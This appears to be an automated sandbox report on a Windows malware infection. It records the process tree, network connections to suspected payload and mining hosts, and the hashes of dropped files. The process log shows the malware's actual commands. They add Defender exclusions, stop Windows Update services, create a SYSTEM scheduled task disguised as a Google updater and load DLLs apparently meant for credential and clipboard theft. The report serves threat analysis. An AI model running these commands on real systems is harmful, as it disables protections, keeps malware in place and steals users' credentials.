C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe" /S /UID=lylal220

C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe

"C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe

"C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe

"C:\Users\Admin\AppData\Local\Temp\5a-73843-b69-7dcb7-18de614ef0c69\Waegumeqolu.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 808

C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-4743J.tmp\lightcleaner.tmp" /SL5="$A020C,833775,56832,C:\Program Files\Microsoft Office 15\TFZIZKLLGT\lightcleaner.exe" /VERYSILENT

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310042200461\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=100.0.4815.21 --initial-client-data=0x26c,0x270,0x274,0x248,0x278,0x25e8a0,0x25e8b0,0x25e8bc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3594612327.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\0694413361.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7004201895.exe"

C:\Users\Admin\AppData\Local\Temp\3594612327.exe

"C:\Users\Admin\AppData\Local\Temp\3594612327.exe"

C:\Users\Admin\AppData\Local\Temp\0694413361.exe

"C:\Users\Admin\AppData\Local\Temp\0694413361.exe"

C:\Users\Admin\AppData\Local\Temp\7004201895.exe

"C:\Users\Admin\AppData\Local\Temp\7004201895.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "s6.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000042051\s6.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3360 -ip 3360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1908 -ip 1908

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3360 -s 1876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 1876

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "s6.exe" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "B1MtcJ18Lphr2749qh03SbWR.exe" /f & erase "C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4752 -ip 4752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 1444

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "B1MtcJ18Lphr2749qh03SbWR.exe" /f

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\7004201895.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 121.208.253.8.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
DE 148.251.234.93:443 yip.su tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 jetpackdelivery.net udp
US 8.8.8.8:53 bolidare.beget.tech udp
US 8.8.8.8:53 d062.userscloud.net udp
US 104.21.93.225:443 flyawayaero.net tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 lycheepanel.info udp
US 85.217.144.143:80 85.217.144.143 tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 net.geo.opera.com udp
RU 91.106.207.50:80 bolidare.beget.tech tcp
US 85.217.144.143:80 85.217.144.143 tcp
US 188.114.96.0:443 jetpackdelivery.net tcp
DE 168.119.140.62:443 d062.userscloud.net tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 link.storjshare.io udp
US 104.21.32.208:443 lycheepanel.info tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 justsafepay.com udp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 188.114.96.0:443 justsafepay.com tcp
US 8.8.8.8:53 potatogoose.com udp
NL 185.26.182.111:443 net.geo.opera.com tcp
RU 45.8.228.16:80 goboh2b.top tcp
US 8.8.8.8:53 225.93.21.104.in-addr.arpa udp
US 8.8.8.8:53 143.144.217.85.in-addr.arpa udp
US 8.8.8.8:53 10.64.42.5.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 208.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 62.140.119.168.in-addr.arpa udp
US 8.8.8.8:53 50.207.106.91.in-addr.arpa udp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 111.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 16.228.8.45.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 9.175.53.84.in-addr.arpa udp
US 136.0.77.2:80 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
NL 185.26.182.124:443 autoupdate.geo.opera.com tcp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 download.opera.com udp
US 136.0.77.2:443 link.storjshare.io tcp
NL 82.145.216.24:443 download.opera.com tcp
US 8.8.8.8:53 demo.seafile.com udp
US 8.8.8.8:53 download3.operacdn.com udp
DE 168.119.152.22:80 demo.seafile.com tcp
GB 95.101.143.176:443 download3.operacdn.com tcp
DE 168.119.152.22:443 demo.seafile.com tcp
US 8.8.8.8:53 124.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 24.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 features.opera-api2.com udp
NL 185.26.182.93:443 features.opera-api2.com tcp
US 8.8.8.8:53 22.152.119.168.in-addr.arpa udp
US 8.8.8.8:53 176.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 93.182.26.185.in-addr.arpa udp
BG 193.42.32.29:80 193.42.32.29 tcp
BG 193.42.32.29:80 193.42.32.29 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
US 8.8.8.8:53 29.32.42.193.in-addr.arpa udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
US 8.8.8.8:53 connectini.net udp
GB 91.109.116.11:443 connectini.net tcp
US 8.8.8.8:53 m7val1dat0r.info udp
US 188.114.96.1:443 m7val1dat0r.info tcp
US 8.8.8.8:53 11.116.109.91.in-addr.arpa udp
US 8.8.8.8:53 1.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 vibrator.s3.pl-waw.scw.cloud udp
US 8.8.8.8:53 link.storjshare.io udp
PL 151.115.10.1:443 vibrator.s3.pl-waw.scw.cloud tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 136.0.77.2:443 link.storjshare.io tcp
US 8.8.8.8:53 wewewe.s3.eu-central-1.amazonaws.com udp
DE 52.219.169.86:443 wewewe.s3.eu-central-1.amazonaws.com tcp
US 8.8.8.8:53 1.10.115.151.in-addr.arpa udp
US 8.8.8.8:53 86.169.219.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 360devtracking.com udp
GB 91.109.116.11:80 360devtracking.com tcp
US 8.8.8.8:53 iplogger.com udp
DE 148.251.234.93:443 iplogger.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 54.120.234.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 184.139.19.162.in-addr.arpa udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
RU 5.42.64.10:80 5.42.64.10 tcp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 24.249.124.192.in-addr.arpa udp
DE 5.75.216.44:27015 5.75.216.44 tcp
US 8.8.8.8:53 44.216.75.5.in-addr.arpa udp
US 8.8.8.8:53 script.google.com udp
DE 172.217.23.206:80 script.google.com tcp
DE 172.217.23.206:443 script.google.com tcp
DE 172.217.23.206:80 script.google.com tcp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
DE 172.217.23.206:443 script.google.com tcp
US 8.8.8.8:53 script.googleusercontent.com udp
NL 142.251.36.1:443 script.googleusercontent.com tcp
US 8.8.8.8:53 mediasitenews.com udp
US 194.87.32.213:443 mediasitenews.com tcp
NL 142.251.36.1:443 script.googleusercontent.com tcp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 213.32.87.194.in-addr.arpa udp

Files

memory/4516-0-0x0000000000210000-0x000000000026E000-memory.dmp

memory/4516-1-0x00000000750D0000-0x0000000075880000-memory.dmp

memory/4516-2-0x0000000004D20000-0x0000000004DBC000-memory.dmp

memory/4516-3-0x00000000054B0000-0x0000000005A54000-memory.dmp

memory/4516-4-0x0000000005000000-0x0000000005092000-memory.dmp

memory/4516-5-0x0000000004EC0000-0x0000000004ED0000-memory.dmp

memory/4516-6-0x0000000004BD0000-0x0000000004BDA000-memory.dmp

memory/4516-7-0x0000000005290000-0x00000000052D4000-memory.dmp

memory/4516-8-0x00000000052D0000-0x00000000052EA000-memory.dmp

memory/1640-9-0x0000000000400000-0x0000000000408000-memory.dmp

memory/1640-11-0x00000000750D0000-0x0000000075880000-memory.dmp

memory/1640-12-0x00000000050A0000-0x00000000050B0000-memory.dmp

memory/4516-13-0x00000000750D0000-0x0000000075880000-memory.dmp

C:\Users\Admin\Pictures\viwAyBM9ypKyIn34z59F3wXG.exe

MD5 dde72ae232dc63298465861482d7bb93
SHA1 557c5dbebc35bc82280e2a744a03ce5e78b3e6fb
SHA256 0032588b8d93a807cf0f48a806ccf125677503a6fabe4105a6dc69e81ace6091
SHA512 389eb8f7b18fcdd1a6f275ff8acad211a10445ff412221796cd645c9a6458719cced553561e2b4d438783459d02e494d5140c0d85f2b3df617b7b2e031d234b2

C:\Users\Admin\Pictures\qeyjAHbYuSzBauOvY1tE1grX.exe

MD5 24fe48030f7d3097d5882535b04c3fa8
SHA1 a689a999a5e62055bda8c21b1dbe92c119308def
SHA256 424a2551d356754c882d04ac16c63e6b50b80b159549d23231001f629455756e
SHA512 45a842447d5e9c10822f7d5db1192a0e8e7917e6546dab6aebe2542b5a82bedc26aa8d96e3e99de82e2d0b662fcac70d6914248371af034b763f5dd85dab0c51

C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe

MD5 2565bdf6fc65a0c1568391c5b354e4a2
SHA1 b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502
SHA256 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697
SHA512 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449

C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe

MD5 ea6ab6fe8ecdb80d9bfff2e4955850a0
SHA1 7d290d99217454b9b4c5133349ce165c56bc763e
SHA256 0e3d94e1f3a765bf1c7fbb407619cc07b3b24741b0f7f87283aff58483b82072
SHA512 3a531e97ebda276f9284bdb352fdbbb04bddb7915bccd815437d959f4a8405f9770c6f46dcd0070a1991e88b654665bc87c748c173765b30d3b7329af86999bf

C:\Users\Admin\Pictures\B1MtcJ18Lphr2749qh03SbWR.exe

MD5 2565bdf6fc65a0c1568391c5b354e4a2
SHA1 b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502
SHA256 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697
SHA512 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449

C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\yfbdsjlje4JOSrr5jnDosrVb.exe

MD5 ea6ab6fe8ecdb80d9bfff2e4955850a0
SHA1 7d290d99217454b9b4c5133349ce165c56bc763e
SHA256 0e3d94e1f3a765bf1c7fbb407619cc07b3b24741b0f7f87283aff58483b82072
SHA512 3a531e97ebda276f9284bdb352fdbbb04bddb7915bccd815437d959f4a8405f9770c6f46dcd0070a1991e88b654665bc87c748c173765b30d3b7329af86999bf

C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\b8BD8mUZg1QzK4WHCOlyefC6.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\FDIwW1gq0WDUJMX44AqGq19O.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/2396-100-0x0000000000300000-0x000000000061C000-memory.dmp

C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/540-132-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\Pictures\InrSNGhXx4T6LsNwqSxd93uX.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

memory/3032-149-0x00007FF60D7C0000-0x00007FF60D8AC000-memory.dmp

C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

memory/4332-154-0x0000000000320000-0x000000000086D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310042200417284332.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/2396-157-0x0000000005050000-0x00000000050B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-COA0R.tmp\InrSNGhXx4T6LsNwqSxd93uX.tmp

MD5 83827c13d95750c766e5bd293469a7f8
SHA1 d21b45e9c672d0f85b8b451ee0e824567bb23f91
SHA256 8bd7e6b4a6be9f3887ac6439e97d3d3c8aaa27211d02ecbd925ab1df39afe7ae
SHA512 cdbdd93fc637772b12bdedb59c4fb72a291da61e8c6b0061ad2f9448e8c949543f003646b1f5ce3e1e3aebc12de27409ddd76d3874b8f4f098163a1ff328b6f0

memory/2396-153-0x0000000005180000-0x0000000005342000-memory.dmp

memory/2396-160-0x0000000004E80000-0x0000000004E90000-memory.dmp

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

MD5 6ad412bff055c51d135c5e6f5cf636ec
SHA1 87697c12c49f220333c4b302741ea79e66314bfb
SHA256 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662
SHA512 f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2310042200430574200.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/4200-166-0x0000000000320000-0x000000000086D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe

MD5 f1e756b85ee7ddbd40d3a4213956c693
SHA1 c728d9c975e8e2562210da21ca9a43f8a12c21aa
SHA256 786b943c54412ea1361cceb2cc72d380ff10acc1b604d72c2c791d7ad8b45957
SHA512 6288ab846cab77a4c50e284f89216daf2a348d9044d013970566efb6818d1d464e95f29a5f96d52e018d175c470cf1e6c1e0df3628c7a52014a8c8387dfa08f8

C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe

MD5 6ad412bff055c51d135c5e6f5cf636ec
SHA1 87697c12c49f220333c4b302741ea79e66314bfb
SHA256 9b998a1a18d617e58024725dc368361b4f42171e731f49f5d0b21384942d0662
SHA512 f4b88d38d5ce778170778dfa22a204e6966823c56a60589f5b28901bf41912cbae78c5e503dc2617a5080fe9fe62b1e2f1a70f96d5bdc508f26249de95ada153

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

MD5 aebaf57299cd368f842cfa98f3b1658c
SHA1 cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
SHA512 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e

C:\Users\Admin\Pictures\kepPL1XOY5LSSrh2bfHa1ijC.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

C:\Users\Admin\Pictures\WmYtLkKaP9RNVnFfd1iN0jGZ.exe

